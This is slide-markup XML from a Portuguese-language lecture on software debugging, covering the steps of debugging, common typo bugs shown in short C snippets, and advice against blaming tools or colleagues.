              <a:t>Lembrete: bug fixes tendem a ter poucas LOC (~10)</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="242" name="Google Shape;242;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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Passos para Depura</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ção de um Bug</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Google Shape;107;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Reproduzir o bug</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Localizar o bug</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Identificar a causa do bug</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Corrigir o bug</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Google Shape;108;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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4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Sugestão: foque em pequenos erros ou typos</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="248" name="Google Shape;248;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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49" name="Google Shape;249;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600100" y="1328425"/>
            <a:ext cx="2509500" cy="7389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latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>if (x &amp; 1 == 0)</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>   …</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="250" name="Google Shape;250;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600100" y="2319025"/>
            <a:ext cx="4481100" cy="10158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latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>while ((c == getchar()) != EOF)</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>   if (c = '\n')</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>      break;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="251" name="Google Shape;251;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600100" y="3538225"/>
            <a:ext cx="3047100" cy="7389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latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>for (i= 0;i&lt;n; i++);  </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    a[i] = 0;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="252" name="Google Shape;252;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7872374" y="82374"/>
            <a:ext cx="992860" cy="12460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45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="6452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Sugestão: foque em pequenos erros ou typos (cont.)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="Google Shape;258;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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59" name="Google Shape;259;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447700" y="1480825"/>
            <a:ext cx="3047100" cy="32325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latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>switch (c) { </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  case '&lt;':</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    mode = LESS;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    break; </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  case '&gt;' :</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    mode = GREATER;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    break; </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  defualt:</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    mode = EQUAL; </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    break;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="260" name="Google Shape;260;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7948574" y="82374"/>
            <a:ext cx="992860" cy="12460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4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4</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>. Corrigir o bug</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266" name="Google Shape;266;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Tende a ser mais fácil ainda, supondo que o bug já foi localizado e sua causa identificada</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Sugestão: verificar se o bug também ocorre em outras partes do código</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="Google Shape;267;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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4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O que </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng"/>
              <a:t>não</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> fazer</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="Google Shape;273;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Culpar o compilador, biblioteca, framework, etc</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Culpar terceiros, outros devs, etc</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>"Fix the problem, not the blame"</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>"Não entre em pânico"</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Resumo: depuração possui um contexto psicológico que deve ser trabalhando e entendido </a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="Google Shape;274;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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75" name="Google Shape;275;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8104925" y="139700"/>
            <a:ext cx="894849" cy="11666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4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Depuração com o Pato de Borracha</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="281" name="Google Shape;281;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
